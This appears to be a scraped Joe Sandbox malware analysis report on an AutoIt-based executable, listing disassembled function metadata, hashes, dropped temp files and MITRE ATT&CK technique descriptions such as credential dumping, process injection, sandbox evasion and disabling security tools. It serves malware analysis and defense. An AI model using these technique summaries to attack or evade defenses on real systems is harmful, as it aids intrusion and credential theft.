Instruction ID: 241075ac4d2eb389bec1b83e2141c7e601678bf0d9da66cdca47d75f291d6dfd
Opcode Fuzzy Hash: a946551f366e150a092018808a27a623e4dfb0a3feeb0dba8c440cd176eb729d
Instruction Fuzzy Hash: A111C2B0501225BEDF248F618C99EFBFF68FF06755F10912EFA05A6140D270A985DAF1

Function 00E980A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00E9830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00E980C8,?,00000000,?,?), ref: 00E98322

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E980CB
htons.WSOCK32(00000000,?,00000000), ref: 00E98108

Strings

255.255.255.255, xrefs: 00E980E3

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: b11c443b144f104f1cafd0961702578b16e87b056a02cdf377725ea4cbb94fab
Instruction ID: 110a0335491fdf7c1f0001e114cbe5b7b3a17b5865d40e212ae9d2bc0e1452dc
Opcode Fuzzy Hash: b11c443b144f104f1cafd0961702578b16e87b056a02cdf377725ea4cbb94fab
Instruction Fuzzy Hash: 76112130200205ABDF20AFA4CD42FFEB374FF05320F109527F911B72A1DA32A805C691

Function 00E30A8D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E23C26,00EE62F8,?,?,?), ref: 00E30ACE

Part of subcall function 00E27D2C: _memmove.LIBCMT ref: 00E27D66

_wcscat.LIBCMT ref: 00E650E1

Strings

c, xrefs: 00E30B0E

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID: c
API String ID: 257928180-921687731
Opcode ID: 1d5aeab3ad9124bc3044b7f018c1ec58159f6032b3b8c426485635c6a09e7549
Instruction ID: 4948a508fbab14eeb643c7c92567ea5574781331404fc92d2a141be8feccf119
Opcode Fuzzy Hash: 1d5aeab3ad9124bc3044b7f018c1ec58159f6032b3b8c426485635c6a09e7549
Instruction Fuzzy Hash: 8911CC35A0421C9B8B40EBA4DC06EDD77FCEF49354F0124A5B988F7151DA70EB88CB11

Function 00E792E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E27F41: _memmove.LIBCMT ref: 00E27F82

Part of subcall function 00E7B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E7B0E7

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E79355

Strings

ListBox, xrefs: 00E7931F
ComboBox, xrefs: 00E792F4

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 0de5581798abdba68eac63906c8990ad438557095bee219c84a01ed6a9a50bfc
Instruction ID: 80dc8b2e0289c669bbf3b168eb9e1ec271d7be7fd46f603eb04410979d103e60
Opcode Fuzzy Hash: 0de5581798abdba68eac63906c8990ad438557095bee219c84a01ed6a9a50bfc
Instruction Fuzzy Hash: 4F01F171A05224ABCB04EBA0CC928FE73A9FF06320B14661AF976772D2DF31580C8760

Function 00E791DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E27F41: _memmove.LIBCMT ref: 00E27F82

Part of subcall function 00E7B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E7B0E7

SendMessageW.USER32(?,00000180,00000000,?), ref: 00E7924D

Strings

ListBox, xrefs: 00E79217
ComboBox, xrefs: 00E791EC

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: eaaf775d4a1ca9addb98680c76abed15e2763d0fa8e0fec3ad3555f149f48fe9
Instruction ID: a0054b110d0e4ebf72fd1ccb05aac278335793b182c586845b95ebe31b0b438e
Opcode Fuzzy Hash: eaaf775d4a1ca9addb98680c76abed15e2763d0fa8e0fec3ad3555f149f48fe9
Instruction Fuzzy Hash: D2018871A45214BBCB14F7A0D992EFF73E8DF45300F146055B51677293EA215E0C96B1

Function 00E79264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E27F41: _memmove.LIBCMT ref: 00E27F82

Part of subcall function 00E7B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E7B0E7

SendMessageW.USER32(?,00000182,?,00000000), ref: 00E792D0

Strings

ListBox, xrefs: 00E7929C
ComboBox, xrefs: 00E79271

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: e8395efcf2d297af02d881925dc454f963efaeca1c85d3d9973d13dc9d444208
Instruction ID: ae3cd0d4d4e6210409a39514b21429c50b87f96faeacdfdad6ffc58c135e7637
Opcode Fuzzy Hash: e8395efcf2d297af02d881925dc454f963efaeca1c85d3d9973d13dc9d444208
Instruction Fuzzy Hash: 8101F771A4121477CF00F7A0D982EFF73EC9F01300F146016B90673293DA215E0C8271

Function 00E46DAE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00E46DD0
__calloc_crt.LIBCMT ref: 00E46DE9

Strings

@R, xrefs: 00E46E00

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: __calloc_crt
String ID: @R
API String ID: 3494438863-2347139750
Opcode ID: 1def00e4f2a5f681527f67c8f65e8eb76d5eb43195bd93f1d478b6c746373f0e
Instruction ID: be35c018128094971bce1a4a698371bfd4a398b01ca74d47296683c865bbe9cd
Opcode Fuzzy Hash: 1def00e4f2a5f681527f67c8f65e8eb76d5eb43195bd93f1d478b6c746373f0e
Instruction Fuzzy Hash: A1F0AF71B0821ADFF728DF1ABD816A527D5EB5A364F101427F200FE2A0EB7088859682

Function 00E851CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00E851E8
_wcscmp.LIBCMT ref: 00E851FA

Strings

#32770, xrefs: 00E851F4

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 40fafdfb4275f99f43eb95a8bacc2c827a84b55a1cc7fd09b75bdefca3f1e922
Instruction ID: 89a29d5716c901128c3960bdd3e79457a80b0c579e67e8852f413a2dd913a5b5
Opcode Fuzzy Hash: 40fafdfb4275f99f43eb95a8bacc2c827a84b55a1cc7fd09b75bdefca3f1e922
Instruction Fuzzy Hash: 67E02B3290032C1AD710A696AC49AA7F7ACEB45721F000167F954E3050E5609A0987D0

Function 00E781BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00E781CA

Part of subcall function 00E43598: _doexit.LIBCMT ref: 00E435A2

Strings

AutoIt, xrefs: 00E781BE
Error allocating memory., xrefs: 00E781C3

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 3160924fb36490fcf9a7dc3be1173c4bb72b51d97f0712d4a93a2393e4394800
Instruction ID: eb9ea080285b9df6f3b4433cc89425c2db88f06889affbd512c6caeb96f94ba6
Opcode Fuzzy Hash: 3160924fb36490fcf9a7dc3be1173c4bb72b51d97f0712d4a93a2393e4394800
Instruction Fuzzy Hash: 3ED012322C531836D21432A57D0AFC66A884B15B55F445056BB08755D38AD599C242D9

Function 00E5B511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00E5B564: _memset.LIBCMT ref: 00E5B571

Part of subcall function 00E40B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00E5B540,?,?,?,00E2100A), ref: 00E40B89

IsDebuggerPresent.KERNEL32(?,?,?,00E2100A), ref: 00E5B544
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E2100A), ref: 00E5B553

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00E5B54E

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: b16c0285d7179efca98260592b87910a84eef10742bb457a9a00263c2d1ceea9
Instruction ID: 2b66c013854bcb44ec8f4c259f92c0faa365c74bb5fc05ae9b20be9aed8e4f0b
Opcode Fuzzy Hash: b16c0285d7179efca98260592b87910a84eef10742bb457a9a00263c2d1ceea9
Instruction Fuzzy Hash: 34E06D706003108FD725DF69E504B427BE4AB04745F009D2CE986F6261EBB5E40CCB61

Function 00EA5BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EA5BF5
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00EA5C08

Part of subcall function 00E854E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E8555E

Strings

Shell_TrayWnd, xrefs: 00EA5BEE

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 321d2b9acd151ef4e382adef2baa41a53379b953ffcb8ac079a796cf42ffed30
Instruction ID: b6c5c0bf9af23b821a91fec8e749c0d67dcc72e309389709d98535e74e406bb3
Opcode Fuzzy Hash: 321d2b9acd151ef4e382adef2baa41a53379b953ffcb8ac079a796cf42ffed30
Instruction Fuzzy Hash: 84D0A932388310BAE334BBB0AC0BF932A50AB05B10F000835B21ABA1D0C8E06800C240

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report LisectAVT_2403002B_466.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\29mFDn2J0

C:\Users\user\AppData\Local\Temp\aut139.tmp

C:\Users\user\AppData\Local\Temp\aut169.tmp

C:\Users\user\AppData\Local\Temp\inhumation

C:\Users\user\AppData\Local\Temp\supergroups

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Windows Analysis Report
LisectAVT_2403002B_466.exe

Function 00E23B4C Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Function 00E24FE9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62
COMMON

Function 00E24AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00E893DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 00E23015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Function 00E23041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 00E271EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00E23633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

